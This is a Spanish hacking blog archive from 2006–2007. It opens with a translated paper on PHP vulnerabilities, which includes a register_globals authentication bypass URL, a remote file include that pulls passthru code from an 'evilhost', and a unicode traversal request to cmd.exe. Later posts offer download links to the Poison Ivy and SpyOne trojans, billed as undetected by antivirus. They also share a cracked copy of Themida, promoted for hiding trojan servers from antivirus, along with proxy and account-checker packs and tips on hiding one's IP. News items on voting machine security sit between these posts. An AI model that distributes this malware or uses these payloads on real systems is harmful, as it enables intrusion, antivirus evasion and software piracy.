OV3RR4YD 53CURITY

Vulnerabilidades comunes en aplicaciones escritas en PHP

2007-03-05T16:00:00.000-08:00

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

A Study In Scarlet
Vulnerabilidades comunes en aplicaciones escritas en PHP

Shaun Clowes
SecureReality

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Traducido al español por Di Biase Jos‚ Luis - josx@interorganic.com
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

--- < Contenido > --------------------------------------------------

1. Introducci¢n
2. Caveats y Alcance
3. Variables Globales
4. Archivos Remotos
5. Upload de Archivo
6. Librer¡as
7. Sesiones
8. Array asociativos y otros
9. Funciones que hay que utilizar con cuidado
10. Protegi‚ndose
11. Responsabilidad - Lenaguaje vs Programador
12. Otros

"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford

--- < 1. Introducci¢n > ----------------------------------------------------

Este investigaci¢n fue basada en la charla realizada durante BlackHat briefings
en Singapur y Hong Kong en abril del a¤o 2001. Esta charla fue titulada
"Breaking In Through the Front Door - The impact of Web Applications and
Application Service Provision on Traditional Security Models". Aqu¡ se invirti¢
un gran tiempo comentando acerca de PHP. Para lo que no sepan que es PHP, PHP
significa "PHP Hipertext Preprocessor". Es un lenguaje de programaci¢n (
dise¤ado especificamente para Internet ) en el cual PHP se embebe en las paginas
web. Cuando un Cliente hace un pedido a una pagina, el servidor web primero pasa
la pagina a un interprete de lenguaje que ejecuta el codigo, luego la pagina
resultado es enviada al cliente.

Obviamente esta aproximaci¢n esta mas relacionada con la naturaleza del paso de
una pagina a otra de una aplicaci¢n web que de un lenguaje CGI como C y Perl.
PHP ( y otros lenguaje para internet ) tienen la siguientes caracteristicas:
+ Interpretados
+ Ejecuci¢n R pida - El interprete esta dentro del servidor web, no fork() o
setup overhead.
+ Muchas Utilidades - Cientos de funciones no triviales incluidas.
+ Sintaxis simple - no se declaran variables y variable poco tipeadas.

Durante el transcurso de este escrito voy a tratar de explicar porque yo siento
estas ultimas dos caracteristicas las que hacen a las aplicaciones escritas en
PHP f cil de atacar y dificil para defender. Despu‚s voy a terminar con un
planteo acerca de la distribucion de culpas cuando se habla de seguridad del
software.

"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford

--- < 2. Caveats y Alcance > -----------------------------------------------

Casi todas la observaciones de este escrito se refieren a una instalaci¢n de PHP
4.0.4pl1 por default ( con soprte para Mysql, PostgreSQL, IMAP and OpenSSL )
corriendo bajo APACHE 1.3.19 en Linux. Esto quiere decir que el nivel lo que
ocurre puede variar particularmente, ya que muchas veces el comportamiento de
para la misma entrada es diferente en distintas versiones.

Adem s, los que apoyan PHP tienden a defender el lenguaje basandose en que es
totalmente configurable. Yo creo que la gran mayor¡a de usuarios no modifican la
configuraci¢n por default. Por esto no siento presi¢n en defender mi posici¢n
basada en las opciones de configuraci¢n, ademas inclui una secci¢n sobre como
defender las aplicaciones PHP usando esas configuraciones.

Algunas personas creen que esta clase de trabajo es Trivial o Obvio
particularmente desde el punto de vista que yo no discuto acerca de
vulnerabilidades especificas. Para probar que estos riesgos son reales y que
hasta los programadores que tratan caen en estos 4 detallados advisories.

"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes

--- < 3. Variables Globales > ------------------------------------------------

Como mencionamos anteriormente, las variables en PHP no se declaran, son
automaticamente creadas la primera vez que se usan. Se les pone el tipo
automaticamente basada en contexto que son usadas. Esto es una forma muy
conveniente de hacer las cosas desde la perspectiva del programador ( y
obviamente es un herramienta escencial en un lenguaje de desarrllo de
aplicaciones rapido ). Una vez creadas las variables pueden ser referenciadas
desde cualquier parte del programa ( excepto en funciones donde debe ser
explicitamente incluida con el 'global' (funci¢n). El resultado de estas
caracter¡sticas es que las variables son casi nunca inicializadas por el
programador, despu‚s de todo, cuando son creadas est n vac¡as ( ej. "").

Obviamente el Main de una aplicaci¢n web basadas en PHP toma alguna entrada del
cliente ( variables de formulario, upload de archivos, cookiw etc),
Procesa la entrada y devuelve una salida basada en esa entrada. Para hacerlo lo
mas simple posible la entrada casi siempre es proveida en la forma de variables
globales. Como en este codigo html:

---------------------------------------

Esto mostrar un text box y un boton de submit. Cuando el usuario aprieta el
bot¢n de submit el script de PHP test.php se ejecuta para procesar la entrada.
Cuando se ejecuta la variable $hello contendr el texto que el usuario puso en
el text box. Es importante darse cuenta las implicaciones de esto £ltimo, esto
quiere decir que un atacante desde remoto puede crear cualquier variable que
desee y tenerla declarada como global. Si encambio de usar el form anterior para
llamar a test.php, el atacante llama directamente a la url como
"http://server/test.php?hello=hi&setup=no", no solo ser $hello="hi" cuando el
script se ejecute sino que $setup ser "no" tambi‚n.

Un ejemplo dde como esto puede ser realmente un problema real es en un script
que fue dise¤ado para autentificar a usuarios antes de mostrarlo informaci¢n
importante. Por ejemplo:

if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

En una operaci¢n normal el c¢digo se fijar el password para decidir si el
usuario debe ser autentificado. Despu‚s se fija si ya fue autentificado y
muestra un informaci¢n importante. El problema radica en que el c¢digo
incorrectamente asume que la variable $auth estar vac¡a a menos que se llene
desde ah¡. Recordando que un atacante puede crear variables como globales, una
url como 'http://server/test.php?auth=1' haria que falle la autentificaci¢n del
password pero igualmente el script crea que estoy autentificado.

Para redondear lo anterior, un script PHP no puede confiar en ninguna variable
si no fue expl¡citamente asignada. Cuando uno tiene un gran numero de variables,
esto puede ser una tarea muy ardua.

Una aproximaci¢n para proteger un script es fijarse que variables no est n en el
array HTTP_GET/POST_VARS[] (dependiendo del m‚todo que se use para enviar el
formulario GET o POST ). Cuando se configura PHP con track_vars enabled ( como
lo es como default ) las variables enviadas por el usuarios estan disponibles en
dos lugares, como variables globales y tambi‚n como elementos de un array que
mencionamos anteriormenet. Igualmente, es importante darse cuenta de que hay
cuatro arrays diferentes para la entrada del usuario, HTTP_GET_VARS para las
variables enviadas en la URL de la pericion GET, HTTP_POST_VARS para las
variables enviadas de manera POST, HTTP_COOKIW_VARS para las variables enviadas
como parte del header de cookies y de una manera limitada el HTTP_POST_FILES (
en las versiones mas recientes de PHP ).
Un script seguro tiene que fijarse en los 4 arrays.

"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson

--- < 4. Archivos Remotos > ----------------------------------------------------

Voy a repetir esto con frecuencia durante este escrito, PHP es un lenguaje muy
rico, viene con una gran cantidad de funcionalidades y trata de hacerle la vida
f cil al programador para programar ( o dise¤ador web como a veces es ).
Desde la perspectiva de la seguridad, cuanto mas funcionalidad superflua ofrece
un lenguaje y menos intutitivas las posibilidades, se hace m s dificultoso
escribir aplicaciones seguras. Un exelente ejemplo de esto es la funcionalidad
de Archivos Remotos de PHP.

El codigo siguiente de PHP se utiliza para abrir un archivo:

if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
\n");
?>

El c¢digo abre un archivo especificado en la variable $filename para leerlo. Si
falla muestra un mensaje de error. Obviamente esto puede llegar a ser un
problema de seguridad si el usuario puede poner lo que quiera en $filename y por
ejemplo mostrar /etc/passwd, pero de otra forma poco intuitiva se puede leer
datos de otro sitio web/ftp. La funcionalidad de archivos remotos sirve
justamente para que con casi cualquier funci¢n de manejo de archivos de PHP
puede manejar transparentemente archivos remotos por HTTP and FTP. Si $filename
tendria:
(por ejemplo)
http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir PHP har¡a una
petici¢n HTTP al server "destino", en este caso tratando de explotar la falla
unicode.

Esto es mas interesante con relaci¢n a otras 4 funciones que tiene incluida la
funcionalidad de archivos remotos (*** excepto en Window ***), include(),
require(), include_once() y require_once(). Estas funciones toman un archivo lo
leen, y lo parsean como c¢digo php. Son usadas la mayor¡a de las veces para
usar librer¡as (o bibliotecas), donde hay c¢digo php y se la incluye cuando se
la necesita.
Ahora mira el siguiente c¢digo:

include($libdir . "/languages.php");
?>

Aparentemente $libdir es una variable de configuraci¢n que ya hemos asignado
anteriormente en el c¢digo, que contiene el directorio en donde est n los
archivos de las librer¡as. Si el atacante puede hacer que la variable no la
asigne el script (lo que es una tarea no tan dificultosa) y en vez de hacer
submit puede modificar en comienzo del path. Esto no sirve para nada por que
solo tienen acceso a el archivo languages.php en el directorio que ellos elijan
( ataques del tipo poison null como en perl no funcionan con PHP) pero si pueden
grabar un archivo llamado languages.php en cualquier directorio conteniendo por
ejemplo:

passthru("/bin/ls /etc");
?>

despu‚s asignan $libdir a http:/// cuando php encuentra la sentencia
include php hace la petici¢n HTTP al evilhost, extrae el c¢digo del atacante y
lo ejecuta, d ndonos de esa manera un listado del /etc en el browser. Te t‚nes
que dar cuenta que el cliente quiz s no este ni corriendo php por que se ejecuta
el servidor remoto.

"There are no crimes and no criminals in these days" - Sherlock Holmes

Hay 10 acusaciones contra cracker rumano

2006-12-09T07:21:00.000-08:00

A Victor Faur se le acusa de infiltrarse en más de 150 ordenadores de la Nasa, el Ministerio de Energía y la Marina de los EEUU.

Parece ser que durante los últimos dos años Victor y su "Equipo del Sombrero Blanco" se han dedicado a asaltar e infectar un gran número de ordenadores. Empezaban con el sencillo método prueba y error mediante un programa que probaba millones de posibilidades, para luego ganar privilegios dentro del sistema y pasar a otros ordenadores.

Según la denuncia los ordenadores eran infectados con programas que los convertían en huéspedes de chats en los que se conectaban los miembros del equipo de hackers.

La Nasa dice que el valor de los daños asciende a 1.4 millones dólares, mientras que en el Ministerio de Energía y la Marina de los EEUU tan solo son 100.000 dólares.

Parece ser que Faur ya había sido acusado de un delito similar por ls autoridades rumanas.

En este caso la condena podría ascender a 54 años de cárcel.

Fuente:
http://www.infobae.com/notas/nota.php?IdxSeccion=1&Idx=290101

OffiCat, detectando archivos de Office potencialmente peligrosos

2006-12-09T07:04:00.000-08:00

OffiCat es una nueva herramienta gratuita para Windows, lanzada por la empresa norteamericana SourceFire, que a través de una consola de comando podemos averiguar si el archivo ofimático que poseamos pueda ser potencialmente peligroso.

Pero no temáis, ya que las intrucciones las tenéis en su sitio oficial. Se trata de una pequeña aplicación, de tan sólo 35 KB, que nos permitirá añadir mayor seguridad viendo lo fiable que pueda ser cualquier fichero ofimático antes de ser abierto por Microsoft Office.

Vía | Kriptópolis

GoogleHacker 2.1 [Tools]

2006-12-09T06:55:00.000-08:00

Con esta tool aprenderas sobre las ultimas busquedas en google, estas busquedas son especiales, me refiero a que son para encontrar sistemas vulnerables a algun tipo de ataque, encontrar bases de datos, maillist, y muchas otras, la tool esta en su ultima version y contiene gran variedad de formulas de busqueda.

Descargar

¿Tienes un Pendrive?

2006-12-08T17:01:00.000-08:00

Si tienes un pendrive tu mayor problema es el tener que darle el mismo uso siempre, claro eso solo te puede pasar si no has leido este articulo, sigue leyendo y descubriras que realmente puedes dar mucho mas uso a ese aparato que siempre llevas conigo o casi siempre xD.

-Software portable

Una aplicación portátil es un programa de ordenador que se puede copiar a un dispositivo portátil de almacenamiento, como por ejemplo una memoria USB, un iPod, o un repro ductor MP3, luego, puede llevarse a cualquier sitio donde haya un ordenador (siempre que tenga el mismo sistema operativo para el que la aplicación fue creada) y puede usarse inmediatamente. Basta con insertar la memoria USB en el computador, buscar la aplicación, y ejecutarla. Las aplicaciones portátiles siguen la filosofía de los LiveCD, no hay necesidad de instalarla ni de modificar el contenido del disco duro del computador anfitrión de ninguna manera.

Dentro de las aplicaciones portátiles, tenemos programas de navegación de Internet, correo electrónico, procesador de palabras, h oja de cálculo, presentaciones gráficas, etc. Si además de las aplicaciones, copiamos nuestros archivos de datos, podemos llevarnos una "oficina" en la palma de la mano, y trabajar en cualquier computador a donde lleguemos.

No todas las aplicaciones informáticas son portátiles. Usualmente existe una versión normal de la aplicación (típicamente no portátil), y luego, ésta se modifica para crear una aplicación portátil. Por otro lado, hay aplicaciones que sin ser modificadas pueden ser usadas como aplicaciones para llevar, como eMu le o Durie, ya que se distribuyen en un ejecutable y no necesitan ser instaladas sino solo copiarse a una carpeta, que bien podría estar en una memoria USB.

Aqui teneis un paquete pensado para memorias USB de 256 MB (aunque es recomendable 512MB).
Se llama Portable Apps Suite e incluye:

Portable Firefox (navegador) Portable Thunderbird (cliente email) Portable OpenOffice.org (suite ofimática) Portable AbiWord (procesador Word) Portable NVU (Web editor) Portable Sunbird (calendario y lista de tareas) Portable FileZilla (FTP cliente) Portable Gaim (mensajería instantánea)

Descarga

-Sistema operativo portable

MPVPM: Este producto de complicadisimo nombre es una aplicación que la gente de Metropipe.net distribuye libremente. El producto está construido a partir del emulador QEMU . Ellos han tomado el emulador y han creado una imagen de la ligera distribución DSL. Puesto que el emulador QEMU es ajecutable desde Windows sin instalación es perfecto para ser lanzado desde el pendrive.

Cuando nos descargamos el producto desde la pagina web en la sección de "productos" de la misma (aquí) y lo descomprimimos obtenemos los siguientes ficheros:
Si ejecutamos qemu-win.bat lanzamos el emulador que toma la imagen mydsl.iso y la carga como si de un sistema operativo normal se tratase. El contenido de qemu-win.bat es muy sencillo, le indica al emulador que fichero hace las veces de disco duro y cual hace las veces de cd-rom. Habilita el sonido y la red.

Al ejecutarlo se abre una ventana en la que vemos como se va cargando una distribución de linux.
Al terminar de arrancar tenemos un bonito escritorio con acceso directo a varias aplicaciones:

La mayoria de las aplicaciones son enfocadas al uso del equipo en la red ya que incorpora dos navegadores (Firefox, Dillo), dos clientes de correo electrónico (Thunderbird, Sylpheed) , un visor de pdf (xPDF), un reproductor multimedia (xZGV) y las mas comunes aplicaciones de toda distribucion (xterm, xpaint, emelfm etc.. ).

Además incluye gratuitamente el programa Metropipe Tunneler. Es un programa de la misma compañía que nos ha preparado este sistema y ofrece la posibilidad de navegar de forma privada por toda la red. Para ello encripta nuestro tráfico y lo hace pasar por una cadena de "proxies".

El conjunto no es tan lento como otras emulaciones y es una opción a tener en cuenta para aquellos que no quieren el Windows ni en pintura y se ven en la necesidad de navegar o leer su correo desde una maquina con el Sistema Operativo de Microsoft instalado.

Tambien sería de utilidad para gente que no ha visto nunca el sistema Linux y sienta curiosidad por su apariencia, su uso, el esquema de sus ficheros y carpetas etc...

Bueno esto ha sido todo otro dia os cuento algunas cosas mas.

Poison Ivy [Troyano]

2006-12-08T16:43:00.000-08:00

Aqui os traigo un troyano de los que mas me gustan
su nombre es Poison Ivy, su aspecto dinamico y su facilidad
a la hora de usarlo son sus armas mas contundentes para
que lo usemos.

Para los que se inicien en las practicas de intrusiones os dejo una version "privada" segun dicen la saco una persona que pidio la version de pago al creador del troyano y se la quedo sin pagar, por el momento no es detectada por los antivirus mas usados, recordar que eso no durara mucho, si realmente quereis hacerlo indetectable debeis leer mucho y aprende sobre varios temas como offsets,firmas,arquitectura de los antivirus,compresores etc etc...

Descargas:
-Video explicativo Poison Ivy
-Poison ivy "privado"

Enlaces adicionales:
-Manual no-ip (por si no podeis abrir los puertos del router)
-Manual Poison Ivy

Themida 1.0.8

2006-12-05T18:19:00.000-08:00

Aqui teneis una nueva version crackeada. no se si recordais cuando ya os hable sobre este software.

Descargar Themida 1.0.8

Descargar videos del youtube

2006-12-04T14:14:00.000-08:00

Tantas preguntas para una sola respuesta: VideoDownloader Firefox Plugin

¿Estás cansado de tener que copiar y pegar la dirección de cada página para poder bajar un video? Ahora es incluso más fácil !

El plugin para Firefox de VideoDownloader añade un pequeño icono en la barra de estado, en la parte inferior del navegador, y un botón en la barra de herramientas de navegación.
Simplemente haz clic en dicho icono o botón, desde la página donde estés viendo el video, y se descargará automáticamente !

Cuando los votos se hacen bits, un virus puede decidir quien gana

2006-11-30T16:42:00.000-08:00

Crece en Estados Unidos y Europa la preocupación por la seguridad de
la votación electrónica

Por Mercè Molist

¿Podría un equipo de doce hackers cambiar el rumbo de unas elecciones? La respuesta es sí, según un estudio del Brennan Center sobre votación electrónica. Cuando las papeletas se transforman en bits, los riesgos de la seguridad informática, como intrusos, virus y troyanos, entran en el juego democrático.

En las recientes elecciones en Estados Unidos, donde el 39% de la
población usó máquinas de votación electrónica, se perdieron 18.000
votos en el distrito 13 de Florida. Una cuestión peliaguda, en un
estado donde el candidato republicano ganó al demócrata por 373 votos.

¿Dónde están los 18.000 perdidos? En unas máquinas que no tenían
sistema de "back-up" ni daban recibos en papel por voto emitido, lo
que imposibilita un recuento. La propia cifra de 18.000 votos
desaparecidos es sólo una aproximación, en base a la participación
en otros distritos.

Es lo que tiene el fraude en la votación electrónica: no deja
huella. Lo explica el investigador Jon Stokes en su estudio "Cómo
robar una elección hackeando el voto": "Se puede alterar la
tabulación de votos, el registro de los mismos y también el recuento
de formas indetectables".

Los fallos de "software" que retrasaron la apertura de algunas mesas
y recuentos fueron la norma en las elecciones norteamericanas. Lo
anormal sucedía en Pennsylvania, con el fenómeno bautizado como
"vote flipping" (voto saltarín): el elector escogía a un candidato y
el ordenador marcaba a su contrario.

O en Maryland, donde la máquina aseguraba al votante que ya había
votado, cuando aún estaba en el proceso. Nadie sabe cuántas personas
insistieron, en cuántas ocasiones el ordenador no contó su voto y en
cuántas lo contó dos o tres veces. O el candidato a alcalde en el
pequeño pueblo de Poinsett que se votó a sí mismo, pero la máquina
le asignó cero votos.

Después de las elecciones, el experto en seguridad Bruce Schneier
denunciaba: "Las máquinas están "protegidas" con llaves de minibar
de hotel. El "software" está mal diseñado. Los votos computados se
guardan en archivos fácilmente manipulables. Las máquinas pueden ser
infectadas con virus. Algunas funcionan con Windows, con todos los
fallos de seguridad que conlleva".

Recientemente, un grupo de hackers holandeses demostraba que las
máquinas de votación electrónica que empiezan a usarse en Europa son
también inseguras. En un programa de televisión, mostraron como las
Nedap ES3B, que han adquirido Irlanda, Alemania, Francia, Gran
Bretaña, Holanda y Dinamarca, podían reprogramarse para jugar al
ajedrez, o espiar a 25 metros de distancia los votos que se les
introducían.

El servicio secreto danés reaccionó retirando 1.200 máquinas. Pero
no de la marca Nedap, que representa el 90% de equipos para la
votación electrónica en aquel país, sinó de la empresa holandesa
Sdu. La también holandesa Nedap prometió en un comunicado enmendar
los fallos detectados.

Estos incidentes pueden achacarse a simples errores. Pero cada vez
más voces avisan contra ellos, porque facilitan los fraudes
intencionados. Al acabar las elecciones norteamericanas, la
organización Electronic Frontier Foundation reclamaba un cambio
legislativo que obligue a los fabricantes a someterse a auditorías
independientes y hacer público el código de sus programas.

El estudio "La maquinaria de la democracia: protegiendo las
elecciones en un mundo electrónico", del Brennan Center, va más allá
y, con la ayuda de expertos de todo el mundo, dilucida si sería
posible cambiar el rumbo de unas elecciones, manipulando las
principales máquinas en uso en Estados Unidos: Sequoia, Diebold y
Election Systems & Software.

Su conclusión es que sería suficiente con un grupo de doce personas.
Los expertos detectaron 120 formas de sabotaje a las que son
vulnerables estos aparatos: "Lo más fácil sería introducir un
programa troyano, cuando la máquina está en la fábrica o a través de
sus conexiones inalámbricas, que infectase a las otras y se
autodestruyese, acabada la tarea".

Informáticos y asociaciones de derechos civiles aseguran que no es
ciencia-ficción. El vídeo "Hacking Democracy", de la organización
Black Box Voting, muestra cómo se puede reconfigurar fácilmente una
máquina Diebold o manipular el archivo donde guarda los votos. Nada
está cifrado y no quedan trazas de la manipulación.

Tampoco es imposible que alguien manipule los programas cuando la
máquina está aún en la fábrica. En los últimos años, Diebold ha
sufrido diversos accesos no autorizados a sus redes, robos de
documentos e incluso del código de sus programas.

Jon Stokes asegura: "Internet está llena de documentos que explican
vulnerabilidades de estas máquinas y cómo explotarlas. Antes, sólo
debíamos confiar en el Comité Electoral para tener unas elecciones
limpias. Ahora, debemos confiar en la empresa que ha fabricado la
máquina, en sus trabajadores y en cualquier tercera parte que toque
el "software"".

Pere Vallès, consejero delegado de la empresa Scytl, especializada
en votación electrónica, afirma: "Estas empresas lo han hecho muy
mal, por su poca seguridad y el hecho de ser sistemas cerrados, como
una caja negra. Son muy vulnerables y, potencialmente, se podrían
cambiar unas elecciones manipulando estas máquinas".

Vallès considera que "el voto electrónico no debería eliminarse sino
hacerse con transparencia", aunque no ve mercado para las máquinas
en Europa: "Tiene sentido en Estados Unidos, porque el sistema
electoral es muy complicado. Lo que nosotros necesitamos es subir la
participación y dar un uso al DNI digital, para lo que el voto por
Internet es mejor".

Suiza es el país pionero en voto por Internet. Un 60% de la población ha votado así este año. Pero en España queda un largo camino para usar la red o máquinas de voto electrónico en unas elecciones generales, afirma Vallès: "Primero, hay que cambiar la
ley electoral, que es una ley orgánica y un tema muy delicado, lo que significa que deben ponerse todos de acuerdo. Hay para rato".

Videos Seguridad Informatica [PACK]

2006-11-29T12:30:00.000-08:00

- La herramienta más usada por Microsoft
- Conferencia de Richard Stallman I
- Conferencia de Richard Stallman II
- Conferencia de Richard Stallman III
- Revolution OS
- Hacktivistas: Los agitadores de la Red + Codigo Linux
- Hackers Españoles
- Odisea en busca de Hackers
- New York City Hackers
- Charla de Miguel de Icaza
- Utilizacion de NESSUS
- Utilizacion del IDS SNORT
- Firewall de Windos XP
- Seguridad en WinForms de .NET
- Captura de Bandera
- Cracking WEP
- Ataque a una aplicacion
- Utilizacion de SSH y SFTP
- Antes, durante y despues de la Criptografia publica

Borre sus huellas en la Red

2006-11-29T12:28:00.000-08:00

Windows guarda datos sobre sus actividades en Internet, desde la navegación por sitios prohibidos hasta sus charlas secretas. Elimine la evidencia.

Internet, al igual que la luna llena, ejerce un influjo poderoso y oscuro sobre la mayoría de personas. Al primer indicio de soledad en la oficina, cualquier empleado con acceso a la Red aprovechará la conexión de banda ancha para buscar fotografías y videos prohibidos, navegar en sitios poco recomendables y descargar juegos y canciones que le servirán luego de entretención.

Por desgracia, Windows guarda datos de todo cuanto se hace en la Red, y las andanzas de los usuarios por los más bajos rincones del ciberespacio quedan registradas en alguna parte del PC, listas para ser descubiertas por cualquiera con el conocimiento suficiente.

Por esa razón, es recomendable borrar siempre las huellas. Eso no solamente le ahorrará problemas cada final de año, cuando el personal técnico de su oficina haga el inventario de software del PC, sino que también evitará que su información personal caiga en manos equivocadas si cambia de trabajo o si debe entregar el PC o el portátil a la empresa.

Con estas cuatro tareas, usted podrá dormir más tranquilo de ahora en adelante:

El historial delator

El programa de navegación Internet Explorer cuenta con una herramienta denominada Historial, que almacena todos los sitios web visitados en las últimas semanas.

Se trata de un instrumento muy útil, especialmente si usted olvida con facilidad los nombres de sus sitios web favoritos, pero resulta problemático si suele recorrer con frecuencia páginas indebidas.

Para que el navegador no lo deje en evidencia, abra el programa, dé clic en el menú Herramientas, seleccione ‘Opciones de Internet’ y dé clic en la pestaña General del cuadro Opciones de Internet. En la sección Historial, dé clic en ‘Borrar historial’ y escoja ‘Sí’ cuando el programa le pregunte si desea confirmar esa acción.

En caso de que no quiera que Internet Explorer almacene la lista de sitios recorridos, en la misma parte cambie a cero el número en ‘Días que puede guardar las páginas en historial’. Para finalizar, dé clic en Aceptar.

Archivos descargados

A medida que navega, y sin que usted lo note, Internet Explorer guarda en su PC archivos provenientes de los sitios web que visita, como imágenes, botones, etc. Estos también lo pueden incriminar.

Para borrarlos, abra de nuevo el cuadro Opciones de Internet y dé clic en el botón ‘Eliminar archivos’ en la sección ‘Archivos temporales de Internet’.

Para deshacerse completamente de las huellas, marque el cuadro ‘Eliminar todo el contenido sin conexión’ y dé clic en Aceptar. El computador tomará unos segundos para borrar los archivos antes de permitirle dar clic en Aceptar.

‘Galletas’ virtuales

El propósito principal de unos pequeños archivos llamados cookies (galletas) es que los sitios web puedan identificar a los visitantes frecuentes con el fin de personalizar las páginas para que les resulten más útiles.

Cuando usted visita un sitio con cookies (Amazon, Hotmail y Yahoo, entre otros), probablemente le sean solicitados datos como su nombre y sus temas de interés. Esa información queda en la base de datos del sitio web, pero la cookie, que se almacena en su PC, es el que permite al sitio web identificarlo y asociar los datos con usted.

De esa manera, es posible crear una especie de ‘historial clínico’ de cada usuario, algo que se usa para mostrarle contenido personalizado o avisos que se ajusten más a sus gustos y necesidades.

Por ejemplo, si usted recorre por primera vez Amazon y busca ediciones recientes de El Quijote de la Mancha, la tienda en línea le ofrecerá información sobre nuevas versiones del libro cada vez que entre, hasta que deje de ser su tema favorito.

Eso no es malo; el problema es que cualquier persona que use su PC puede revisar la carpeta de los cookies para saber qué sitios se han visitado. Allí suele figurar el nombre del sitio y la dirección. Así las cosas, es recomendable borrar de vez en cuando estos elementos si quiere mantener privadas sus actividades en Internet.

Para ello, vuelva al cuadro ‘Opciones de Internet’ y dé clic en el botón ‘Eliminar cookies’.

Mensajes peligrosos

Pocas cosas favorecen niveles de intimidad tan altos como los programas de mensajería instantánea. A través de ellos, los usuarios se confiesan su amor, intercambian todo tipo de opiniones y desnudan el alma.

Por eso, es recomendable evitar cualquier rastro que pueda quedar de las conversaciones realizadas a través de aplicaciones como MSN Messenger, de Microsoft, que es el programa de mensajería más popular del mundo, con más de 110 millones de usuarios, según datos de la firma investigadora de mercados Nielsen NetRatings.

Aunque como opción predeterminada MSN Messenger no almacena las charlas, asegúrese de que así sea abriendo el menú de herramientas del programa y dando clic en ‘Opciones’.

Una vez allí, seleccione la pestaña Mensajes y el ‘Historial de mensajes’. Revise que no esté marcada la opción ‘Guardar automáticamente un historial de mis conversaciones’.

En caso de que descubra que sus diálogos íntimos están siendo almacenados, revise la ruta configurada en el cuadro ‘Guardar mis conversaciones en esta carpeta’.

Abra el explorador de Windows y encuentre la carpeta en cuestión para eliminarla y poner a salvo su pasado. Finalmente, dé clic en ‘Aceptar’ y dedíquese a conversar con sus contactos con la certeza de que nadie conocerá sus secretos.

Articulo escrito por: DIEGO CAMARGO

Como ocultar nuestra ip

2006-11-29T12:16:00.000-08:00

Primero ¿Qué es un Proxy?

Bueno un Proxy en esencia es un servidor que se interpone entre ud y el servidor al que vas a ingresar.Navegación sin Proxy
UD ===> Servidor

Navegación con Proxy
UD===> PROXY ===> Servidor

Como veis en el Servidor cuando se navega SIN PROXY la ip suya es la que aparece en los logs de este, sin embargo cuando se usa un servidor PROXY la ip de este es el que aparece en el servidor.

Bueno ahora vamos a la práctica.

¿Dónde consigo un servidor Proxy?

http://www.proxylists.net/http_highanon.txt
Ami me gusta conseguirlos en esta web por 2 motivos.
1º Son en texto plano
2º me gustan sin mas xD

Una vez tenemos los proxis procedemos a verificar que Proxy están buenos, con esta herramienta
http://www.proxychecker.net/onlinechecker/checkproxy.shtml

Una vez el chequeo nos arroje proxys en buen estado solamente tenemos que meterlos en donde lo necesitemos x ejemplo nuestro navegador, herramienta de escaneo, gestor de descargas etc..

Algunos ejemplos:

Para usar el Proxy con el Internet Explorer
Herramientas/opciones de Internet/conexiones/configurar lan/ pulsamos en utilizar Proxy y metemos la ip y puerto, luego aceptar y listo

Para usarlo con el Mozilla Firefox
Herramientas/opciones/configurar conexión/configuración manual de Proxy/ pulsamos en utilizar el mismo proxy para todos los protocolos y metemos la ip y puerto, luego aceptar y listo

Para RapGet (descargar de rapidshared, megaupload, uploagin, etc..) (RapGet.com)
Ajustes/Proxy/ pulsamos en usar, ingresamos la ip y el puerto y le damos en OK

No solo existen esta clase de proxys, también existen de tipo SOCKS4 y SOCKS5 ademas de los muy populares webproxys que por lo general tienen una velocidad un poco mayor pero no es posible utilizarla en aplicaciones tipo RapGet.

Algunos de estos son:
anonycat.com
www.hidemyass.com
www.proxy7.com
www.proxyfoxy.com
www.78y.net
www.75i.net
www.proxyz.be
www.freeproxy.ru/en/free_proxy/cgi-proxy.htm

Un saludo.

Proxi Tools [PACK]

2006-11-29T12:08:00.000-08:00

Contenido:
1. Athena
2. Lucifer
3. Proxessor v1.82
4. Proxessor v1.02
5. Combressor v1.61
6. Charon v0.6
7. StAPH v1.23
8. RapidShare Premium Account Checker v1.2
9. ProxyGrab v0.5
10. Z-Leecher v1.0
Download
http://rapidshare.com/files/4778504/Proxy___Wordlist_Tools.zip.html

SpyOne 1.0 (español)

2006-11-29T12:02:00.000-08:00

Estupendo Troyano, extremadamente estable, bypass de firewall actual, Se hace indetectable con casi cualquier compresor-encriptador mas o menos potable, fácil de manejar.

http://www.mytempdir.com/891824 Español

THEMIDA 1.7 FULL

2006-11-29T11:55:00.000-08:00

Themida proporcionar una protección fiable y segura a nuestras aplicaciones difícilmente podía ser más sencillo gracias a programas como Themida.

Dispone de una tecnología propia a la que denomina SecureEngine, que ejecuta partes del código al mismo nivel de prioridad que el Sistema operativo lo que le permite supervisar y controlar las aplicaciones ejecutadas (esto incluye los desensambladores y otras herramientas usadas en la tecnología inversa).

Se puede configurar las protecciones que queremos aplicar a nuestra aplicación, ofreciendo más de diez protecciones distintas: contra el volcado de memoria, unidades virtuales, encriptación de recursos, ofuscación, etc.

Sin embargo, a pesar de los complejos sistemas de protección que utiliza, el programa en sí es bastante sencillo de usar, pues básicamente consiste en elegir el ejecutable a proteger y elegir las protecciones que se le van a aplicar, permitiéndonos personalizar los mensajes de error e información.

Nota:Muy bueno para dejar los server de los troyanos indetectables ante los AV(Antivirus).

DESCARGAR THEMIDA 1.7 FULL

El TOP 20 de vulnerabilidades de Internet

2006-11-29T11:52:00.000-08:00

El SANS Institute ha actualizado su Top 20 de las vulnerabilidades más críticas de Internet y que son más frecuentemente explotadas.

La primera lista, que contenía las 10 vulnerabilidades más críticas, fué confeccionada hace cuatro años por el SANS Institute, el FBI y el NIPC.

En esta revisión, la 7.0, se han elaborado varias listas, con varias vulnerabilidades cada una:

TOP 20 de SANS, de 15 de Noviembre, quedando la lista de vulnerabilidades de esta forma:

Cross-Platform Applications
C1 Web Applications
C2. Database Software
C3. P2P File Sharing Applications
